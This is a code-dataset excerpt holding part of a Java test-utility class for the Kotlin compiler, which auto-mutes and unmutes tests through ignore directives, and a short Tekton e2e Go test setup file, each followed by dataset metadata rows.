// So only file paths passed to this parameter will be used in navigation actions, like "Navigate to testdata" and "Related Symbol..."
public static void runTest(DoTest test, TargetBackend targetBackend, @TestDataFile String testDataFile) throws Exception {
runTest0(test, targetBackend, testDataFile);
}
public static void runTestWithCustomIgnoreDirective(DoTest test, TargetBackend targetBackend, @TestDataFile String testDataFile, String ignoreDirective) throws Exception {
runTestImpl(testWithCustomIgnoreDirective(test, targetBackend, ignoreDirective), null, testDataFile);
}
// In this test runner version, NONE of the parameters are annotated by `TestDataFile`.
// So DevKit will use test name to determine related files in navigation actions, like "Navigate to testdata" and "Related Symbol..."
//
// Pro:
// * in most cases, it shows all related files including generated js files, for example.
// Cons:
// * sometimes, for too common/general names, it shows many variants to navigate
// * it adds an additional step for navigation -- you must choose an exact file to navigate
public static void runTest0(DoTest test, TargetBackend targetBackend, String testDataFilePath) throws Exception {
runTestImpl(testWithCustomIgnoreDirective(test, targetBackend, IGNORE_BACKEND_DIRECTIVE_PREFIX), null, testDataFilePath);
}
private static void runTestImpl(@NotNull DoTest test, @Nullable TestCase testCase, String testDataFilePath) throws Exception {
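        // When the test class does not override runTest itself, give the mute-with-database wrapper a chance to skip a muted test.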
if (testCase != null && !isRunTestOverridden(testCase)) {
Function0<Unit> wrapWithMuteInDatabase = MuteWithDatabaseKt.wrapWithMuteInDatabase(testCase, () -> {
try {
test.invoke(testDataFilePath);
}
catch (Exception e) {
throw new IllegalStateException(e);
}
return null;
});
if (wrapWithMuteInDatabase != null) {
wrapWithMuteInDatabase.invoke();
return;
}
}
test.invoke(testDataFilePath);
}
private static boolean isRunTestOverridden(TestCase testCase) {
Class<?> type = testCase.getClass();
while (type != null) {
for (Annotation annotation : type.getDeclaredAnnotations()) {
if (annotation.annotationType().equals(WithMutedInDatabaseRunTest.class)) {
return true;
}
}
type = type.getSuperclass();
}
return false;
}
private static DoTest testWithCustomIgnoreDirective(DoTest test, TargetBackend targetBackend, String ignoreDirective) throws Exception {
return filePath -> {
File testDataFile = new File(filePath);
boolean isIgnored = isIgnoredTarget(targetBackend, testDataFile, ignoreDirective);
if (DONT_IGNORE_TESTS_WORKING_ON_COMPATIBLE_BACKEND) {
// Only ignore if it is ignored for both backends
// Motivation: this backend works => all good, even if compatible backend fails
// This backend fails, compatible works => need to know
isIgnored &= isIgnoredTarget(targetBackend.getCompatibleWith(), testDataFile);
}
try {
test.invoke(filePath);
}
catch (Throwable e) {
if (!isIgnored && AUTOMATICALLY_MUTE_FAILED_TESTS) {
String text = KtTestUtil.doLoadFile(testDataFile);
String directive = ignoreDirective + targetBackend.name() + "\n";
String newText;
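                    // Keep any leading "// !" directive lines in place and insert the ignore directive right after them.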
if (text.startsWith("// !")) {
StringBuilder prefixBuilder = new StringBuilder();
int l = 0;
while (text.startsWith("// !", l)) {
int r = text.indexOf("\n", l) + 1;
if (r <= 0) r = text.length();
prefixBuilder.append(text.substring(l, r));
l = r;
}
prefixBuilder.append(directive);
prefixBuilder.append(text.substring(l));
newText = prefixBuilder.toString();
} else {
newText = directive + text;
}
if (!newText.equals(text)) {
System.err.println("\"" + directive + "\" was added to \"" + testDataFile + "\"");
FileUtil.writeToFile(testDataFile, newText);
}
}
if (RUN_IGNORED_TESTS_AS_REGULAR || !isIgnored) {
throw e;
}
if (PRINT_STACKTRACE_FOR_IGNORED_TESTS) {
e.printStackTrace();
} else {
System.err.println("MUTED TEST with `" + ignoreDirective + "`");
}
return;
}
if (isIgnored) {
if (AUTOMATICALLY_UNMUTE_PASSED_TESTS) {
String text = KtTestUtil.doLoadFile(testDataFile);
String directive = ignoreDirective + targetBackend.name();
String newText = Pattern.compile("^" + directive + "\n", Pattern.MULTILINE).matcher(text).replaceAll("");
if (!newText.equals(text)) {
System.err.println("\"" + directive + "\" was removed from \"" + testDataFile + "\"");
FileUtil.writeToFile(testDataFile, newText);
}
}
throw new AssertionError(String.format("Looks like this test can be unmuted. Remove \"%s%s\" directive.", ignoreDirective, targetBackend));
}
};
}
/**
* @return test data file name specified in the metadata of test method
*/
@Nullable
public static String getTestDataFileName(@NotNull Class<?> testCaseClass, @NotNull String testName) {
try {
Method method = testCaseClass.getDeclaredMethod(testName);
return KtTestUtil.getMethodMetadata(method);
}
catch (NoSuchMethodException e) {
throw new RuntimeException(e);
}
}
@NotNull
public static KtFile loadJetFile(@NotNull Project project, @NotNull File ioFile) throws IOException {
String text = FileUtil.loadFile(ioFile, true);
return KtPsiFactoryKt.KtPsiFactory(project).createPhysicalFile(ioFile.getName(), text);
}
@NotNull
public static List<KtFile> loadToJetFiles(@NotNull KotlinCoreEnvironment environment, @NotNull List<File> files) throws IOException {
List<KtFile> jetFiles = Lists.newArrayList();
for (File file : files) {
jetFiles.add(loadJetFile(environment.getProject(), file));
}
return jetFiles;
}
@NotNull
public static ModuleDescriptorImpl createEmptyModule() {
return createEmptyModule("<empty-for-test>");
}
@NotNull
public static ModuleDescriptorImpl createEmptyModule(@NotNull String name) {
return createEmptyModule(name, DefaultBuiltIns.getInstance());
}
@NotNull
public static ModuleDescriptorImpl createEmptyModule(@NotNull String name, @NotNull KotlinBuiltIns builtIns) {
return new ModuleDescriptorImpl(Name.special(name), LockBasedStorageManager.NO_LOCKS, builtIns);
}
@NotNull
public static File replaceExtension(@NotNull File file, @Nullable String newExtension) {
return new File(file.getParentFile(), FileUtil.getNameWithoutExtension(file) + (newExtension == null ? "" : "." + newExtension));
}
public static boolean isAllFilesPresentTest(String testName) {
//noinspection SpellCheckingInspection
return testName.toLowerCase().startsWith("allfilespresentin");
}
public static boolean isMultiExtensionName(@NotNull String name) {
int firstDotIndex = name.indexOf('.');
if (firstDotIndex == -1) {
return false;
}
        // Several extensions if the name contains another dot
return name.indexOf('.', firstDotIndex + 1) != -1;
}
}
| ["\"JDK_16\""] | [] | ["JDK_16"] | [] | ["JDK_16"] | java | 1 | 0 |
test/e2e/init_test.go
|
// Copyright © 2020 The Tekton Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package e2e
import (
"log"
"os"
"testing"
)
func TestMain(m *testing.M) {
validate()
	log.Println("Running main e2e test suite")
v := m.Run()
os.Exit(v)
}
func validate() {
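	// TEST_CLIENT_BINARY is expected to point at the CLI binary under test; the e2e suite cannot run without it.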
if env := os.Getenv("TEST_CLIENT_BINARY"); env == "" {
		log.Println("\"TEST_CLIENT_BINARY\" env variable is required, cannot proceed with E2E tests")
os.Exit(0)
}
}
| ["\"TEST_CLIENT_BINARY\""] | [] | ["TEST_CLIENT_BINARY"] | [] | ["TEST_CLIENT_BINARY"] | go | 1 | 0 |